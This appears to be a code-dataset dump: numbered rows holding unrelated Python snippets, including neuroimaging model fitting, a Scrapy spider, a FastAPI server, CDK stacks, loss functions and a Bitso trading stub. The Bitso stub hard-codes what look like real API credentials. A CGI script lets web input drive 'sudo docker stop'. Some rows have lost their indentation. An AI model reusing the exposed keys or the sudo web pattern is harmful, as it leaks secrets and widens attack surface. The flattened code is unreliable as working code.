json_dir = '/home/inesv/SB-ref/scripts/analysis_params.json' if str(
sys.argv[2]) == 'cartesius' else 'analysis_params.json'
with open(json_dir, 'r') as json_file:
analysis_params = json.load(json_file)
# use smoothed data?
with_smooth = analysis_params['with_smooth']
# define paths and list of files
if str(sys.argv[2]) == 'cartesius':
filepath = glob.glob(os.path.join(
analysis_params['post_fmriprep_outdir_cartesius'], 'prf', 'sub-{sj}'.format(sj=sj), '*'))
print('functional files from %s' % os.path.split(filepath[0])[0])
out_dir = os.path.join(analysis_params['pRF_outdir_cartesius'],'shift_crop')
elif str(sys.argv[2]) == 'aeneas':
print(os.path.join(
analysis_params['post_fmriprep_outdir'], 'prf', 'sub-{sj}'.format(sj=sj), '*'))
filepath = glob.glob(os.path.join(
analysis_params['post_fmriprep_outdir'], 'prf', 'sub-{sj}'.format(sj=sj), '*'))
print('functional files from %s' % os.path.split(filepath[0])[0])
out_dir = os.path.join(analysis_params['pRF_outdir'],'shift_crop')
# changes depending on data used
if with_smooth == 'True':
# last part of filename to use
file_extension = 'cropped_sg_psc_smooth%d.func.gii' % analysis_params['smooth_fwhm']
# compute median run, per hemifield
median_path = os.path.join(
out_dir, 'sub-{sj}'.format(sj=sj), 'run-median', 'smooth%d' % analysis_params['smooth_fwhm'],'iterative_fit')
else:
# last part of filename to use
file_extension = 'cropped_sg_psc.func.gii'
# compute median run, per hemifield
median_path = os.path.join(out_dir, 'sub-{sj}'.format(sj=sj), 'run-median','iterative_fit')
# list of functional files
filename = [run for run in filepath if 'prf' in run and 'fsaverage' in run and run.endswith(
file_extension)]
filename.sort()
if not os.path.exists(median_path): # check if path to save median run exist
os.makedirs(median_path)
med_gii = []
for field in ['hemi-L', 'hemi-R']:
hemi = [h for h in filename if field in h]
# set name for median run (now numpy array)
med_file = os.path.join(median_path, re.sub(
'run-\d{2}_', 'run-median_', os.path.split(hemi[0])[-1]))
# if file doesn't exist
if not os.path.exists(med_file):
med_gii.append(median_gii(hemi, median_path)) # create it
print('computed %s' % (med_gii))
else:
med_gii.append(med_file)
print('median file %s already exists, skipping' % (med_gii))
# create/load design matrix
png_path = '/home/inesv/SB-ref/scripts/imgs/' if str(
sys.argv[2]) == 'cartesius' else analysis_params['imgs_dir']
png_filename = [os.path.join(png_path, png) for png in os.listdir(png_path)]
png_filename.sort()
dm_filename = os.path.join(os.getcwd(), 'prf_dm_square.npy')
#if not os.path.exists(dm_filename): # if not exists
screenshot2DM(png_filename, 0.1,
analysis_params['screenRes'], dm_filename,dm_shape = 'square') # create it
print('computed %s' % (dm_filename))
#else:
# print('loading %s' % dm_filename)
prf_dm = np.load(dm_filename)
prf_dm = prf_dm.T # then it'll be (x, y, t)
# change DM to see if fit is better like that
# do new one which is average of every 2 TRs
prf_dm = shift_DM(prf_dm)
prf_dm = prf_dm[:,:,analysis_params['crop_pRF_TR']:] # crop DM because functional data also cropped now
# define model params
fit_model = analysis_params["fit_model"]
TR = analysis_params["TR"]
hrf = utilities.spm_hrf(0,TR)
# make stimulus object, which takes an input design matrix and sets up its real-world dimensions
prf_stim = PRFStimulus2D(screen_size_cm=analysis_params["screen_width"],
screen_distance_cm=analysis_params["screen_distance"],
design_matrix=prf_dm,
TR=TR)
# sets up stimulus and hrf for this gridder
gg = Iso2DGaussianGridder(stimulus=prf_stim,
hrf=hrf,
filter_predictions=False,
window_length=analysis_params["sg_filt_window_length"],
polyorder=analysis_params["sg_filt_polyorder"],
highpass=False,
add_mean=False)
# set grid parameters
grid_nr = analysis_params["grid_steps"]
sizes = analysis_params["max_size"] * np.linspace(np.sqrt(analysis_params["min_size"]/analysis_params["max_size"]),1,grid_nr)**2
eccs = analysis_params["max_eccen"] * np.linspace(np.sqrt(analysis_params["min_eccen"]/analysis_params["max_eccen"]),1,grid_nr)**2
polars = np.linspace(0, 2*np.pi, grid_nr)
for gii_file in med_gii:
print('loading data from %s' % gii_file)
data = np.array(surface.load_surf_data(gii_file))
print('data array with shape %s'%str(data.shape))
gf = Iso2DGaussianFitter(data=data, gridder=gg, n_jobs=16, fit_css=False)
#filename for the numpy array with the estimates of the grid fit
grid_estimates_filename = gii_file.replace('.func.gii', '_estimates.npz')
if not os.path.isfile(grid_estimates_filename): # if estimates file doesn't exist
print('%s not found, fitting grid'%grid_estimates_filename)
# do grid fit and save estimates
gf.grid_fit(ecc_grid=eccs,
polar_grid=polars,
size_grid=sizes)
np.savez(grid_estimates_filename,
x = gf.gridsearch_params[..., 0],
y = gf.gridsearch_params[..., 1],
size = gf.gridsearch_params[..., 2],
betas = gf.gridsearch_params[...,3],
baseline = gf.gridsearch_params[..., 4],
ns = gf.gridsearch_params[..., 5],
r2 = gf.gridsearch_params[..., 6])
loaded_gf_pars = np.load(grid_estimates_filename)
gf.gridsearch_params = np.array([loaded_gf_pars[par] for par in ['x', 'y', 'size', 'betas', 'baseline','ns','r2']])
gf.gridsearch_params = np.transpose(gf.gridsearch_params)
# do iterative fit
iterative_out = gii_file.replace('.func.gii', '_iterative_output.npz')
if not os.path.isfile(iterative_out): # if estimates file doesn't exist
print('doing iterative fit')
gf.iterative_fit(rsq_threshold=0.1, verbose=False)
np.savez(iterative_out,
it_output=gf.iterative_search_params)
else:
print('%s already exists'%iterative_out)
## do iterative fit again, now with css, n=1 (isn't that just gaussian?)
#print('doing iterative fit with css ')
#gf.fit_css = True
#gf.iterative_fit(rsq_threshold=0.1, verbose=False)
#iterative_css_out = gii_file.replace('.func.gii', '_iterative_css_output.npz')
#np.savez(iterative_css_out,
# it_output=gf.iterative_search_params)
|
6,328 | 77ea670b537e9ff7082aeb9ed54b011fa8e3a035 | from django.contrib import admin
from employees.models import Leave,EmployeeProfile
admin.site.register(Leave)
admin.site.register(EmployeeProfile)
# Register your models here.
|
6,329 | 6b2a9e8c6e95f52e9ebf999b81f9170fc669cce4 | import os
import time
import requests
from dotenv import load_dotenv
from twilio.rest import Client
load_dotenv()
BASE_URL = 'https://api.vk.com/method/users.get'
def get_status(user_id):
params = {
'user_ids': user_id,
'V': os.getenv('API_V'),
'access_token': os.getenv('ACCESS_TOKEN'),
'fields': 'online'
}
friends_status = requests.post(BASE_URL, params=params)
return friends_status.json()['response'][0]['online']
def send_sms(sms_text):
    """Send *sms_text* via Twilio and return the created message SID.

    Credentials and phone numbers come from the environment:
    TWILIO_ACCOUNT_SID, TWILIO_AUTH_TOKEN, NUMBER_FROM, NUMBER_TO.
    """
    account_sid = os.getenv('TWILIO_ACCOUNT_SID')
    auth_token = os.getenv('TWILIO_AUTH_TOKEN')
    client = Client(account_sid, auth_token)
    message = client.messages.create(
        # BUG FIX: the sms_text parameter was ignored and a hard-coded
        # placeholder body was sent instead.
        body=sms_text,
        from_=os.getenv('NUMBER_FROM'),
        media_url=['https://demo.twilio.com/owl.png'],
        to=os.getenv('NUMBER_TO')
    )
    return message.sid
if __name__ == '__main__':
vk_id = input('Введите id ')
while True:
if get_status(vk_id) == 1:
send_sms(f'{vk_id} сейчас онлайн!')
break
time.sleep(5)
|
6,330 | 1d2dae7f1d937bdd9a6044b23f8f1897e61dac23 | #!/usr/bin/python3
print("content-type: text/html")
print()
import subprocess
import cgi
form=cgi.FieldStorage()
# The container name comes from an untrusted CGI query parameter; pass it
# as a separate argv element with no shell to prevent command injection
# (the original interpolated it into a shell string).
osname = form.getvalue("x")
result = subprocess.run(["sudo", "docker", "stop", str(osname)],
                        capture_output=True, text=True)
status = result.returncode
info = (result.stdout + result.stderr).strip()
if status == 0:
    print("{} OS is stopped succesfully....".format(osname))
else:
    print("some error: {}".format(info))
|
6,331 | be9179b33991ba743e6e6b7d5dd4dc85ffc09fc3 | """
util - other functions
"""
import torch
import numpy as np
from common_labelme import Config
from torch.autograd import Variable
I = torch.FloatTensor(np.eye(Config.batch_size),)
E = torch.FloatTensor(np.ones((Config.batch_size, Config.batch_size)))
normalize_1 = Config.batch_size
normalize_2 = Config.batch_size * Config.batch_size - Config.batch_size
def mig_loss_function(output1, output2, p):
    """Mutual-information-gain style loss between two batch outputs.

    Uses the module-level identity mask I, all-ones matrix E and the
    normalizers sized by Config.batch_size, so both outputs must have
    exactly that batch size. *p* is the class prior dividing output1.
    """
    new_output = output1 / p
    # Pairwise coupling matrix between the two batches.
    m = (new_output @ output2.transpose(1,0))
    # Tiny random jitter keeps log() away from zero on the diagonal; note
    # this makes the loss slightly stochastic.
    noise = torch.rand(1)*0.0001
    m1 = torch.log(m*I+ I*noise + E - I)
    m2 = m*(E-I)
    return -(sum(sum(m1)) + Config.batch_size)/normalize_1 + sum(sum(m2)) / normalize_2
def tvd_loss_function(output1, output2, p):
    """Total-variation-distance style loss; only the signs of the diagonal
    and off-diagonal log terms contribute. Relies on the module-level
    I/E masks sized by Config.batch_size."""
    new_output = output1 / p
    m = (new_output @ output2.transpose(1,0))
    # Random jitter guards log(0) on the diagonal (slightly stochastic).
    noise = torch.rand(1)*0.0001
    m1 = torch.log(m*I + I * noise + E - I)
    m2 = torch.log(m*(E-I) + I )
    return -(sum(sum(torch.sign(m1))))/normalize_1 + sum(sum(torch.sign(m2))) / normalize_2
def pearson_loss_function(output1, output2, p):
    """Pearson (chi-square) style loss: linear reward on the diagonal,
    squared penalty off the diagonal. Uses the module-level I/E masks
    sized by Config.batch_size."""
    new_output = output1 / p
    m = (new_output @ output2.transpose(1,0))
    m1 = m*I
    m2 = m*(E-I)
    m2 = m2*m2
    return -(2 * sum(sum(m1)) - 2 * Config.batch_size) / normalize_1 + (sum(sum(m2)) - normalize_2) / normalize_2
def reverse_kl_loss_function(output1, output2, p):
    """Reverse-KL style loss: negative reciprocal on the diagonal, log
    penalty off the diagonal. Uses the module-level I/E masks sized by
    Config.batch_size."""
    new_output = output1 / p
    m = (new_output @ output2.transpose(1,0))
    m1 = m*I
    # E - I keeps the off-diagonal denominator at 1 so only the diagonal
    # is inverted.
    m1 = -I/(m1.float() + E - I)
    m2 = torch.log(m*(E-I) + I)
    return -(sum(sum(m1)))/normalize_1 + (-sum(sum(m2)) - normalize_2) / normalize_2
def sh_loss_function(output1, output2, p):
    """Squared-Hellinger style loss: inverse-sqrt reward on the diagonal,
    sqrt penalty off the diagonal. Uses the module-level I/E masks sized
    by Config.batch_size."""
    new_output = output1 / p
    m = (new_output @ output2.transpose(1,0))
    m1 = m*I
    # E - I keeps the off-diagonal denominator at 1 so only the diagonal
    # contributes to the sqrt-reciprocal term.
    m1 = torch.sqrt(I/(m1.float() + E - I))
    m2 = torch.sqrt(m*(E-I))
    return -(-sum(sum(m1)) + Config.batch_size)/normalize_1 + sum(sum(m2)) / normalize_2
def entropy_loss(outputs):
    """Mean (over the first dimension) Shannon entropy of *outputs*.

    A small epsilon (1e-4) inside the log guards against log(0) for
    zero probabilities.
    """
    batch_size = outputs.size()[0]
    per_element = -outputs * torch.log(outputs + 0.0001)
    return torch.sum(per_element) / batch_size
def M_step(expert_label,mu):
    """EM M-step: re-estimate each expert's confusion matrix.

    Args:
        expert_label: (batch_size, expert_num) tensor of expert votes;
            when Config.missing is set, negative entries mean "no label"
            and are skipped.
        mu: (batch_size, num_classes) posterior class responsibilities.

    Returns:
        (expert_num, num_classes, num_classes) CUDA tensor; entry
        [R, j, k] estimates P(expert R answers k | true class j).
    """
    if not Config.missing:
        # Every expert labels every sample: one shared column normalizer.
        normalize = torch.sum(mu, 0).float()
        expert_label = expert_label.long()
        expert_parameters = torch.zeros((Config.expert_num, Config.num_classes, Config.num_classes))
        for i in range(mu.size()[0]):
            for R in range(Config.expert_num):
                expert_parameters[R, :, expert_label[i, R]] += mu[i].float()
        expert_parameters = expert_parameters / normalize.unsqueeze(1)
    else:
        # Missing labels: accumulate a per-expert normalizer from only the
        # samples that expert actually labeled.
        normalize = torch.zeros(Config.expert_num,Config.num_classes)
        expert_label = expert_label.long()
        expert_parameters = torch.zeros((Config.expert_num, Config.num_classes, Config.num_classes))
        for i in range(mu.size()[0]):
            for R in range(Config.expert_num):
                if expert_label[i,R] < 0:
                    continue
                expert_parameters[R, :, expert_label[i, R]] += mu[i].float()
                normalize[R] += mu[i].float()
        # Avoid division by zero for rows that received no mass.
        normalize = normalize + 1 * (normalize == 0).float()
        for R in range(Config.expert_num):
            expert_parameters[R] = expert_parameters[R] / normalize[R].unsqueeze(1)
    expert_parameters = expert_parameters.cuda()
    return expert_parameters
def M_step_p_mbem(t):
    """Estimate the class prior as the empirical label frequencies in *t*."""
    labels = t.long()
    counts = torch.zeros(Config.num_classes)
    for idx in range(labels.size(0)):
        counts[labels[idx]] += 1
    return counts / labels.size()[0]
def M_step_mbem(expert_label,t):
    """MBEM M-step: re-estimate expert confusion matrices from hard labels.

    Args:
        expert_label: (batch_size, expert_num) expert votes; negative
            entries denote a missing label and are skipped.
        t: (batch_size,) current hard label estimates.

    Returns:
        (expert_num, num_classes, num_classes) CUDA tensor; entry
        [R, j, k] estimates P(expert R answers k | label j).
    """
    normalize = torch.zeros(Config.expert_num, Config.num_classes)
    expert_label = expert_label.long()
    t = t.long()
    expert_parameters = torch.zeros((Config.expert_num, Config.num_classes, Config.num_classes))
    for i in range(t.size()[0]):
        for R in range(Config.expert_num):
            if expert_label[i, R] < 0:
                continue
            expert_parameters[R, t[i], expert_label[i, R]] += 1
            normalize[R,t[i]] += 1
    # Avoid division by zero for (expert, class) pairs never observed.
    normalize = normalize + 1 * (normalize == 0).float()
    for R in range(Config.expert_num):
        expert_parameters[R] = expert_parameters[R] / normalize[R].unsqueeze(1)
    expert_parameters = expert_parameters.cuda()
    return expert_parameters
def print_recons_result(right_model, confusion_matrix):
    """Print the total-variation gap between learned and true confusions.

    Skips parameter 0 of *right_model* (presumably a non-confusion
    parameter -- TODO confirm); each remaining parameter tensor is
    softmaxed row-wise into a confusion matrix and compared against the
    ground truth confusion_matrix[i-1].
    """
    confusion_loss = 0
    for i in range(1,len(list(right_model.parameters()))):
        para = list(right_model.parameters())[i].detach().cpu()
        #print("Expert %d" %i)
        local_confusion_matrix = torch.nn.functional.softmax(para, dim=1)
        #print(local_confusion_matrix)
        residual_matrix = local_confusion_matrix - confusion_matrix[i-1, :, :]
        residual = torch.sum(abs(residual_matrix))
        confusion_loss += residual
    print("Total variation:", confusion_loss.item())
def initial_priori(train_loader):
    """Initialise the class prior from per-sample majority votes.

    Each sample's label is taken as the argmax of the summed votes in
    right_data (assumed one-hot expert votes -- TODO confirm against the
    dataset); the prior is each class's frequency over the whole loader.
    """
    p = torch.zeros((Config.num_classes))
    total = 0
    for batch_idx, (left_data, right_data, label) in enumerate(train_loader):
        # Sum expert votes and take the majority class per sample.
        linear_sum = torch.sum(right_data, dim=1)
        _, majority = torch.max(linear_sum, 1)
        majority = Variable(majority).long()
        total += label.size()[0]
        for i in range(Config.num_classes):
            p[i] += torch.sum(majority == i).float()
    p = p/float(total)
    return p
def update_priori(model, train_loader):
    """Re-estimate the class prior from the model's current predictions.

    Runs *model* over the whole loader and returns the frequency of each
    predicted class. The alternative loss-gradient and fixed-prior
    strategies below are intentionally left disabled.
    """
    # waiting for solution
    p = torch.zeros((Config.num_classes))
    # updating priori by posteri
    total = 0
    for batch_idx, (left_data, right_data, label) in enumerate(train_loader):
        ep = Variable(right_data).float().cuda()
        images = Variable(left_data).float().cuda()
        outputs = model(images)
        _, predicts = torch.max(outputs.data, 1)
        total += ep.size()[0]
        predicts = predicts.detach().cpu()
        # Count predicted labels per class.
        for i in range(Config.num_classes):
            p[i] += torch.sum(predicts == i).float()
    p = p/float(total)
    '''
    # updating priori by loss
    pri = priori
    pri = Variable(pri, requires_grad=True)
    loss = mig_loss_function(left_outputs.detach(),right_outputs.detach(),p)
    loss.backward()
    grad = pri.grad
    pri = pri.detach() - Config.alpha * grad
    pri = torch.exp(pri)
    pri = pri / torch.sum(pri)
    '''
    '''
    # true priori
    p[0] = 0.5
    p[1] = 0.5
    '''
    return p
6,332 | 5a50ca64810c391231a00c6bfe5ae925ffe5ca7d | from utilidades import moeda
p = float(input('Digite o preço: R$'))
print(f'Metade de {moeda.moeda(p)} é {moeda.metade(p, show=True)}')
print(f'O dobro de {moeda.moeda(p)} é {moeda.dobro(p, show=True)}')
print(f'Aumentando 10%, temos {moeda.aumentar(p, 10, show=True)}')
print(f'Reduzindo 13%, temos {moeda.diminuir(p, 13, show=True)}') |
6,333 | 5ebc4f61810f007fd345b52531f7f4318820b9c8 | from marshmallow import fields, post_load
from rebase.common.schema import RebaseSchema, SecureNestedField
from rebase.views.bid_limit import BidLimitSchema
class TicketSetSchema(RebaseSchema):
    """Marshmallow schema for TicketSet with nested bid limits, auction and nominations."""
    id = fields.Integer()
    bid_limits = SecureNestedField(BidLimitSchema, exclude=('ticket_set',), only=('id', 'price', 'ticket_snapshot'), many=True)
    auction = SecureNestedField('AuctionSchema', only=('id',))
    nominations = SecureNestedField('NominationSchema', only=('contractor', 'ticket_set', 'job_fit', 'auction', 'hide'), many=True)

    @post_load
    def make_ticket_set(self, data):
        # Deferred import — presumably avoids a circular import with rebase.models; confirm.
        from rebase.models import TicketSet
        return self._get_or_make_object(TicketSet, data)

# Module-level schema instances shared by the views.
serializer = TicketSetSchema()
deserializer = TicketSetSchema(strict=True)
update_deserializer = TicketSetSchema(context={'raw': True})
|
6,334 | 2f96e58a825744ae6baafd1bfb936210500f0fd0 | #!/usr/bin/env python3
from aws_cdk import core
import os
from ec2_ialb_aga_custom_r53.network_stack import NetworkingStack
from ec2_ialb_aga_custom_r53.aga_stack import AgaStack
from ec2_ialb_aga_custom_r53.alb_stack import ALBStack
from ec2_ialb_aga_custom_r53.certs_stack import CertsStack
from ec2_ialb_aga_custom_r53.ec2_stack import EC2Stack
# Account/region are supplied by the CDK CLI at synth/deploy time.
deploy_env = core.Environment(
    account=os.environ["CDK_DEFAULT_ACCOUNT"],
    region=os.environ["CDK_DEFAULT_REGION"])
# These need to be injected at synth/deployment time
CIDR = os.getenv("VPC_CIDR", "")
DOMAIN = os.getenv("R53_DOMAIN", "")
SUB_DOMAIN = "code-server"
app = core.App()
# Stack graph: networking -> EC2, certs -> ALB -> Global Accelerator.
net = NetworkingStack(app, "GravitonBlog-NetworkingStack", CIDR, env=deploy_env)
ec2 = EC2Stack(app, "GravitonBlog-EC2Stack", net.vpc, env=deploy_env)
ec2.add_dependency(net)
cert = CertsStack(app, "GravitonBlog-CertsStack",
                  DOMAIN, SUB_DOMAIN, env=deploy_env)
alb = ALBStack(app, "GravitonBlog-ALBStack", net.vpc, ec2.instance,
               cert.domain_cert, env=deploy_env)
alb.add_dependency(net)
alb.add_dependency(ec2)
alb.add_dependency(cert)
aga = AgaStack(app, "GravitonBlog-AGAStack", net.vpc, alb.alb,
               cert.blog_hosted_zone, SUB_DOMAIN, env=deploy_env)
aga.add_dependency(net)
aga.add_dependency(cert)
aga.add_dependency(alb)
app.synth()
|
6,335 | b6898b923e286c66673df1e07105adf789c3151c | from objet import Objet
class Piece(Objet):
    """A coin pickup; coins are the currency spent at the merchant's shop."""

    def ramasser(self, joueur):
        # Picking the coin up credits the player's purse.
        joueur.addPiece()

    def depenser(self, joueur):
        # Spending debits one coin from the player's purse.
        joueur.depenserPiece()

    def description(self):
        return "Vous avez trouvé une piece, peut etre trouverez vous un marchand"
6,336 | c70df1fab0db6f71d22a23836b11d66879879656 | from django.db import models
from django.contrib.contenttypes.models import ContentType
from widgy.generic import ProxyGenericForeignKey, ProxyGenericRelation
from django.contrib.contenttypes.generic import GenericForeignKey, GenericRelation
class Base(models.Model):
    # Generic-FK holder: (content_type, content_id) resolved via ProxyGenericForeignKey.
    content_type = models.ForeignKey(ContentType)
    content_id = models.PositiveIntegerField()
    obj = ProxyGenericForeignKey('content_type', 'content_id')
class Related(models.Model):
    # Reverse side of Base.obj: lists every Base instance pointing at this object.
    bases = ProxyGenericRelation(Base,
                                 content_type_field='content_type',
                                 object_id_field='content_id')
    content = models.CharField(max_length=255)
class AbstractModel(models.Model):
    # Abstract base exercising ProxyGenericRelation inheritance through concrete subclasses.
    bases = ProxyGenericRelation(Base,
                                 content_type_field='content_type',
                                 object_id_field='content_id')
    class Meta:
        abstract = True
class ConcreteModel(AbstractModel):
    # Concrete subclass: inherits the generic relation declared on AbstractModel.
    pass
class Proxy(Related):
    # Proxy model over Related: same table, extra behavior only.
    def some_method(self):
        return True
    class Meta:
        proxy = True
|
6,337 | cba12d076ed8cba84501983fda9bdce8312f2618 | # -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
class ItemCrawlSpider(CrawlSpider):
    """Crawls Auction.co.kr search results for a keyword and scrapes item pages.

    Instantiate with ``keyword``; spaces are converted to '+' for the query string.
    """
    name = 'auction_crwal'
    # NOTE(review): the search host browse.auction.co.kr is not listed here —
    # confirm offsite filtering of search-result pages is intended.
    allowed_domains = ['itempage3.auction.co.kr']

    def __init__(self, keyword=None, *args, **kwargs):
        super(ItemCrawlSpider, self).__init__(*args, **kwargs)
        # Bug fix: str.replace returns a new string and the original code
        # discarded the result, so spaces were never converted to '+'.
        if keyword:
            keyword = keyword.replace(' ', '+')
        self.start_urls = ['http://browse.auction.co.kr/search?keyword=%s&p=1' % keyword]
        print(self.start_urls)

    rules = (
        # Follow item detail pages and parse them.
        Rule(
            LinkExtractor(allow=r'DetailView\.aspx\?itemno=*'),
            callback='parse_item',
            follow=True),
        Rule(LinkExtractor(allow=r'DetailView\.aspx\?itemno=*'))
    )

    def parse_item(self, response):
        """Extract image URL, title and price from an item detail page."""
        i = {}
        i['item_img'] = list(response.xpath(
            '//*[@id="content"]/div[2]/div[1]/div/div/ul/li/a/img').xpath("@src").extract())[0]
        print(i['item_img'])
        i['item_title'] = response.xpath(
            '//*[@id="frmMain"]/h1/span/text()').extract()
        i['item_price'] = response.xpath(
            '//*[@id="frmMain"]/div[2]/div[1]/div/span/strong/text()').extract()
        return i
|
6,338 | b36f3ffed888edaa7716f712f1549dc205799caf | # Generated by Django 3.0.5 on 2020-04-25 15:35
from django.db import migrations, models
import lots.models
class Migration(migrations.Migration):
    # Auto-generated: gives Lots.photo a default image and a dynamic upload path.
    dependencies = [
        ('lots', '0012_auto_20200425_1720'),
    ]
    operations = [
        migrations.AlterField(
            model_name='lots',
            name='photo',
            field=models.ImageField(default='images/default.png', upload_to=lots.models.path_and_rename),
        ),
    ]
|
6,339 | 03147de944c4f75417006a5087e75354dba644ec | import sys
sys.path.append("..")
from packages import bitso as BS
from packages import account as ACCOUNT
from packages import currency_pair as CP
# SECURITY(review): API credentials are hard-coded below — move them to
# environment variables or a secrets store, and rotate the exposed keys.
account=ACCOUNT.Account('577e4a03-540f9610-f686d434-qz5c4v5b6n','dd7b02f5-c286e9d4-f2cc78c3-bfab3')
bs=BS.Bitso(account)
currency_pair=CP.CurrencyPair('btc','xmn')  # NOTE(review): 'xmn' looks like a typo for 'xmr' — confirm
depth=bs.depth(currency_pair)
a=1  # placeholder, presumably a debugger breakpoint anchor
|
6,340 | 49b295c3e323695779eb32181193ef88b678b34d | from fastapi import APIRouter, Depends
from fastapi.responses import RedirectResponse
import app.setting as setting
from app.dependencies import get_project_by_prefix
from app.entities.project import Project
# Short-link router: /go/{prefix} redirects into Notion.
router = APIRouter(
    prefix="/go",
)

@router.get("/{prefix_id}")
def redirect_to_board(project: Project = Depends(get_project_by_prefix)):
    """Redirect to the project's Notion board."""
    return RedirectResponse(url=project.notion_board_url)

@router.get("/{prefix_id}/{ticket_id}")
def redirect_to_ticket(
    ticket_id: str, project: Project = Depends(get_project_by_prefix)
):
    """Redirect to one ticket's Notion page (page id with dashes stripped)."""
    ticket = project.query_ticket(ticket_id=ticket_id)
    notion_url = setting.notion_base_url + ticket.id.replace("-", "")
    return RedirectResponse(url=notion_url)
|
6,341 | c025fccad9d37dff4db3a10455cbe7d92917d8f6 | #!/usr/bin/env python
__author__ = 'greghines'
# Python 2 script: exports Condor Watch classifications from MongoDB into
# pyIBCC's input format, runs IBCC, and pickles the subject index order.
import numpy as np
import matplotlib.pyplot as plt
import csv
import sys
import os
import pymongo
import matplotlib.cbook as cbook
import cPickle as pickle
sys.path.append("/home/greg/github/pyIBCC/python")
import ibcc
client = pymongo.MongoClient()
db = client['condor_2014-09-14']
collection = db["condor_classifications"]
collection2 = db["condor_subjects"]
subjects = []
users = []
classifications = []
# Write the IBCC configuration module that ibcc.runIbcc() will load.
with open("/home/greg/Databases/condor_ibcc.py","wb") as f:
    f.write("import numpy as np\n")
    f.write("scores = np.array([0,1])\n")
    f.write("nScores = len(scores)\n")
    f.write("nClasses = 2\n")
    f.write("inputFile = \"/home/greg/Databases/condor_ibcc.csv\"\n")
    f.write("outputFile = \"/home/greg/Databases/condor_ibcc.out\"\n")
    f.write("confMatFile = \"/home/greg/Databases/condor_ibcc.mat\"\n")
    f.write("nu0 = np.array([30,70])\n")
    f.write("alpha0 = np.array([[3, 1], [1,3]])\n")
import datetime
i = 0
errorCount = 0
# Each record becomes (user index, subject index, blank) where blank == 0
# iff the volunteer marked at least one recognised animal.
for r in collection.find({"$and": [{"tutorial": False},{"subjects" : {"$elemMatch" : {"zooniverse_id" : {"$exists" : True}}}}]}):
    try:
        user_name = r["user_name"]
    except KeyError:
        # Skip anonymous classifications.
        continue
    subject_id = r["subjects"][0]["zooniverse_id"]
    if not(user_name in users):
        users.append(user_name)
    if not(subject_id in subjects):
        subjects.append(subject_id)
    user_index = users.index(user_name)
    subject_index = subjects.index(subject_id)
    if ("marks" in r["annotations"][-1]):
        blank = 1
        for markings in r["annotations"][-1]["marks"].values():
            try:
                if markings["animal"] in ["condor","raven","goldenEagle","coyote","turkeyVulture"]:
                    blank = 0
                    break
                elif markings["animal"] in ["carcassOrScale"]:
                    continue
                else:
                    errorCount += 1
            except KeyError:
                errorCount += 1
    else:
        blank = 1
    i += 1
    #if i == 1000:
    #    break
    if (i % 5000) == 0:
        print i
    classifications.append((user_index,subject_index,blank))
print "====----"
print errorCount
# Remove stale IBCC outputs so this run starts clean.
try:
    os.remove("/home/greg/Databases/condor_ibcc.out")
except OSError:
    pass
try:
    os.remove("/home/greg/Databases/condor_ibcc.mat")
except OSError:
    pass
try:
    os.remove("/home/greg/Databases/condor_ibcc.csv.dat")
except OSError:
    pass
with open("/home/greg/Databases/condor_ibcc.csv","wb") as f:
    f.write("a,b,c\n")
    for u, s, b in classifications:
        f.write(str(u)+","+str(s)+","+str(b)+"\n")
print datetime.datetime.time(datetime.datetime.now())
ibcc.runIbcc("/home/greg/Databases/condor_ibcc.py")
print datetime.datetime.time(datetime.datetime.now())
pickle.dump(subjects,open("/home/greg/Databases/condor_ibcc.pickle","wb"))
6,342 | 2b23237e697cb4ca8f1013d7be343c70fba9541d | import random
class Madlib:
'''
This class generates the madlib from word lists.
'''
def get_madlib(self):
madlib = """
Once there was a {0}. It {1} at the {2}.
Then because of its {3} it {4}. Wow! You sure are {5}!
Thanks! I {6} you very much.
"""
nouns = ['cheesecakes', 'bicycle', 'park', 'computer']
verbs = ['watched tv', 'voted', 'fell over']
adjectives = ['smelly', 'slimy', 'soft', 'loud']
output = madlib.format(
random.choice(nouns),
random.choice(verbs),
random.choice(nouns),
random.choice(nouns),
random.choice(verbs),
random.choice(adjectives),
random.choice(adjectives)
)
return output
|
6,343 | d6fa3039c0987bf556c5bd78b66eb43543fd00fe | from fastapi import FastAPI
from pydantic import BaseModel
from typing import List, Optional
from joblib import load
app = FastAPI()
# Model is loaded once at import time; all requests share this instance.
clf = load("model.joblib")

class PredictionRequest(BaseModel):
    feature_vector: List[float]
    score: Optional[bool] = False  # NOTE(review): currently ignored — anomaly_score is always returned

@app.post("/prediction")
def predict(req: PredictionRequest):
    """Classify one feature vector; returns inlier flag and anomaly score."""
    prediction = clf.predict([req.feature_vector])
    response = {"is_inlier": int(prediction[0])}
    score = clf.score_samples([req.feature_vector])
    response["anomaly_score"] = score[0]
    return response

@app.get("/model_infomation")
def model_infomation():
    # NOTE(review): route and function name misspell "information";
    # kept as-is for API compatibility.
    return clf.get_params()

if __name__ == "__main__":
    print("Running")
|
6,344 | 1af73c0ca38ea32119f622dc14741c0bb0aa08fd | # 001. 웹 서버에 요청하고 응답받기
# Topic: understand requesting a web page and receiving a response object from the server.
# Hint: pass the URL of the target page to requests.get().
import requests
url = "https://www.python.org/"
resp = requests.get(url)
print(resp) # 200: request succeeded
url2 = "https://www.python.org/1"
resp2 = requests.get(url2)
print(resp2) # 404 error: the page could not be found
6,345 | 991c361043eb1539a80b5e8e1db44bc365e7e639 | #!/usr/bin/env/ python
# -*- coding:utf-8 -*-
# Created by: Vanish
# Created on: 2019/9/25
import numpy as np
from scipy import optimize
def sigmoid(z):
    """Elementwise logistic function 1 / (1 + exp(-z))."""
    denom = 1 + np.exp(-z)
    return 1 / denom
def costReg(theta, X, y, lamda):
    """Regularized logistic-regression cost (cross-entropy + L2 penalty)."""
    theta = np.matrix(theta)
    X = np.matrix(X)
    y = np.matrix(y)
    first = np.multiply(-y, np.log(sigmoid(X * theta.T)))
    second = np.multiply((1 - y), np.log(1 - sigmoid(X * theta.T)))
    # The penalty skips theta[:, 0] (the intercept term).
    reg = (lamda / (2 * len(X))) * np.sum(np.power(theta[:, 1:theta.shape[1]], 2))
    return np.sum(first - second) / len(X) + reg
def gradientReg(theta, X, y, lamda):
    """Gradient of costReg; the intercept (i == 0) is not regularized."""
    theta = np.matrix(theta)
    X = np.matrix(X)
    y = np.matrix(y)
    parameters = int(theta.ravel().shape[1])
    grad = np.zeros(parameters)
    error = sigmoid(X * theta.T) - y
    for i in range(parameters):
        term = np.multiply(error, X[:, i])
        if (i == 0):
            grad[i] = np.sum(term) / len(X)
        else:
            grad[i] = (np.sum(term) / len(X)) + ((lamda / len(X)) * theta[:, i])
    return grad
